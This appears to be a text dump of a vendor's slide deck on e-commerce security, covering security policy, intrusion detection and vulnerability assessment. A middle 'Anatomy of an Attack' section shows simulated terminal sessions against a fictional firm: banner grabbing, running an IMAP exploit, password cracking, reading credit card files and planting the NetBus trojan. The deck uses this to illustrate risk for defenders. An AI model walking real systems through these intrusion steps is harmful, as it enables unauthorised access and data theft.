620 likes | 781 Views
Protecting The Digital Economy. David Gerulski Director of Marketing Internet Security Systems. Agenda. Introduction E-Commerce Security Drivers Developing a Security Policy Anatomy of an Attack Policy Enforcement Enterprise Risk Management Security Resources Conclusion. ISS Overview.
E N D
Protecting The Digital Economy David GerulskiDirector of MarketingInternet Security Systems
Agenda • Introduction • E-Commerce Security Drivers • Developing a Security Policy • Anatomy of an Attack • Policy Enforcement • Enterprise Risk Management • Security Resources • Conclusion
ISS Overview • Headquartered in Atlanta, GA, USA • Pioneered vulnerability assessment and intrusion detection technology • Leader in Enterprise Security Management • Publicly traded on NASDAQ: ISSX • Industry leading technology 35+ product awards • 1,000+ employee owners worldwide • Over 300 certified security partners • Over 7,500 customers worldwide
ISS Market Share Network Intrusion Detection & Assessment Market Network Intrusion Detection Market Network Vulnerability Assessment Market Source: International Data Corporation (IDC), August 1999
Business Is Changing Yesterday Today External Focus Internal Focus Suppliers, customers, and prospects all need some form of access Access is granted to employees only Distributed Assets Centralized Assets Applications and data are distributed across servers, locations, and business units Applications and data are centralized in fortified IT bunkers Generate Revenue Prevent Losses The goal of security is to protect against confidentiality breaches The goal of security is to enable eCommerce IT Control Business Control Security manager decides who gets access Business units want the authority to grant access Source: Forrester Research, Inc.
60% 40% 20% 54% 47% 38% 1996 1997 1998 The Threat Grows Source: 1998 Computer Security Institute/FBI Computer Crime and Security Survey
E-Commerce Issues Principle Business Drivers • Increase Revenue • Increase Profitability Principle Security Drivers • Greater Susceptibility to Attack • Greater Probability of Catastrophic Consequences • Much Greater “Loss to Incident” Ratio
Our Strength Is Our Weakness • In Touch With Anyone With a Modem • Have an International Presence • Partners Can Now Collaborate • Leverage Web-based Supply Chain Technologies • Employees Can Work From Home, at Night, Over the Weekends, and on Holiday • Application Servers Can Support Entire Divisions
Consequences • Exposure to Legal Liability
DDoS Distributed Denial-of-Service Company A UNIX Firewall Web Server NT UNIX UNIX NT Company B Router University A Company C Company D
Consequences • Exposure to legal liability • Decreased Stockholder Equity • 30 Seconds on CNN • Damaged Image
Consequences • Exposure to Legal Liability • Decreased Stockholder Equity • 30 Seconds on CNN • Damaged Image • Decreased Employee Productivity • Loss of Intellectual Property & Assets • Inefficient Use of Resources
Summary • E-Business is here to stay • Networks are exposed and under attack • There’s no more turning a “blind eye” • It’s a business issue and it should be treated in a business-like manner • Implement a security program not a security technology
Security Policy • Blue Print for Good Security Program • Standards Based - British Standard 7799 • Management Buy In • High Level to Technical • Business Driven Not Vendor Driven • Non-Static
Enforced Security Policy • Minimize Exposure to Vulnerabilities • Prepare for Attacks on Our Systems • Manage Internal Staff Behavior • Manage External Access and Activity • Maintain Appropriate Security Configurations& Response Strategies • Exploit Built-in Security Features • Measure and Record Patterns and Trends for Future Security Planning
Registrant : Big Widget, Inc. (BIGWIDGET_DOM) 1111 Big Widget Drive Really Big, CA 90120 US Domain Name: BIGWIDGET.COM Administrative Contact, Technical Contact: Zone Contact, Billing Contact: Simms, Haywood (HS69) Dodge, Rodger (RD32) Haywood.Simms@BIGWIDGET.COM Rodger.Dodge@BIGWIDGET.COM 1111 Big Widget Drive, UMIL04-07 1111 Big Widget Drive, UMIL04-47 Really Big, CA 90210 Really Big, CA 90210 678-443-6001 678-443-6014 Record last updated on 24-June-2000 Record expires on 20-Mar-2010 Record created on 14-Mar-1998 Database last updated on 7-Jun-2000 15:54 Domain servers in listed order: EHECATL.BIGWIDGET.COM 208.21.0.7 NS1-AUTH.SPRINTLINK.NET 206.228.179.10 NS.COMMANDCORP.COM 130.205.70.10
hacker: ~$ telnet bigwidget.com 25 Trying 10.0.0.28... Connected to bigwidget.com Escape character is '^]'. Connection closed by foreign host. telnet bigwidget.com 143 hacker:~$ Trying 10.0.0.28... Connected to bigwidget.com. * OK bigwidget IMAP4rev1 Service 9.0(157) at Wed, 14 Oct 1998 11:51:50 -0400 (EDT) (Report problems in this server to MRC@CAC.Washington.EDU) . logout * BYE bigwidget IMAP4rev1 server terminating connection . OK LOGOUT completed Connection closed by foreign host.
hacker ~$ ./imap_exploit bigwidget.com IMAP Exploit for Linux. Author: Akylonius (aky@galeb.etf.bg.ac.yu) Modifications: p1 (p1@el8.org) Completed successfully. hacker ~$ telnet bigwidget.com Trying 10.0.0.28... Connected to bigwidget.com. Red Hat Linux release 4.2 (Biltmore) Kernel 2.0.35 on an i686 login: root bigwidget:~# whoami root bigwidget:~# cd /etc cat ./hosts bigwidget:~# 127.0.0.1 localhost localhost.localdomain 208.21.2.10 thevault accounting 208.21.2.11 fasttalk sales 208.21.2.12 geekspeak engineering 208.21.2.13 people human resources 208.21.2.14 thelinks marketing 208.21.2.15 thesource information systems bigwidget:~# rlogin thevault
cd /data/creditcards thevault:~# cat visa.txt thevault:~# Allan B. Smith 6543-2223-1209-4002 12/99 Donna D. Smith 6543-4133-0632-4572 06/98 Jim Smith 6543-2344-1523-5522 01/01 Joseph L.Smith 6543-2356-1882-7532 04/02 Kay L. Smith 6543-2398-1972-4532 06/03 Mary Ann Smith 6543-8933-1332-4222 05/01 Robert F. Smith 6543-0133-5232-3332 05/99 crack /etc/passwd thevault:~# Cracking /etc/passwd... username: bobman password: nambob username: mary password: mary username: root password: ncc1701 thevault:~# ftp thesource Connected to thesource 220 thesource Microsoft FTP Service (Version 4.0). Name: administrator 331 Password required for administrator. ******* Password: 230 User administrator logged in. Remote system type is Windows_NT.
ftp> cd \temp 250 CDW command successful. send netbus.exe ftp> ftp> local: netbus.exe remote: netbus.exe 200 PORT command successful. 150 Opening BINARY mode data connection for netbus.exe 226 Transfer complete. quit ftp> thevault:~$ telnet thesource Trying 208.21.2.160. .. Connected to thesource.bigwidget.com. Escape character is '^]'. Microsoft (R) Windows NT (TM) Version 4.00 (Build 1381) Welcome to MS Telnet Service Telnet Server Build 5.00.98217.1 login: administrator password: ******* *=============================================================== Welcome to Microsoft Telnet Server. *=============================================================== C:\> cd \temp netbus.exe C:\TEMP>
David Smith President@bigwidget.com NetBus 1.6, by cf David Smith < dsmith@bigwidget.com > My Raise < URGENT > Dear Mr. Smith I would like to thank you for the huge raise that you have seen fit to give me. With my new salary of $350,000.00 a year I am sure I am the highest paid mail clerk in the company. This really makes me feel good because I deserve it. Your Son, Dave Connected to the.source.bigwidget.com Screendump
Crack NetBus imap Anatomy of the Attack BigWidget’s Network Web Server NT UNIX UNIX NT UNIX Firewall Router Network E-Mail Server Clients & Workstations
Real World Web Page Defacements
Policy Enforcement Through Detection and Response
What Is Vulnerable? IT Infrastructure Web Server Servers Firewall Router Network E-Mail Server Clients & Workstations
What Is Vulnerable? Applications E-Commerce Web Server Peoplesoft SAP Firewall Router E-Mail Server Web Browsers
What Is Vulnerable? Databases Microsoft SQL Server Sybase Oracle Firewall Router
What Is Vulnerable? Operating Systems Solaris HP-UX Windows NT Firewall Router Network AIX Windows 95 & NT
What Is Vulnerable? Networks Web Server Servers Firewall Router TCP/IP Netware E-Mail Server
Enterprise Risk Management
corrective action report GetAdmin Vulnerability: Severity: IP Address: OS: Fix: High Risk 215.011.200.255 Windows NT 4.0 From the Start menu, choose Programs/Administrative Tools/User Manager. Under Policies/User Rights, check the users who have admin privileges on that host. Stronger action may be needed, such as reinstalling the operating system from CD. Consider this host compromised, as well as any passwords from any other users on this host. In addition, Apply the post-SP3 getadmin patch, or SP4 when available. Also refer to Microsoft Knowledge Base Article Q146965.txt. Vulnerability Assessment Service
INTERNAL Managed Intrusion Detection Service EMAIL ALERT/ LOG SESSION TERMINATED SESSION LOGGED ATTACK DETECTED RECONFIGURE FIREWALL/ ROUTER ATTACK DETECTED RECORD SESSION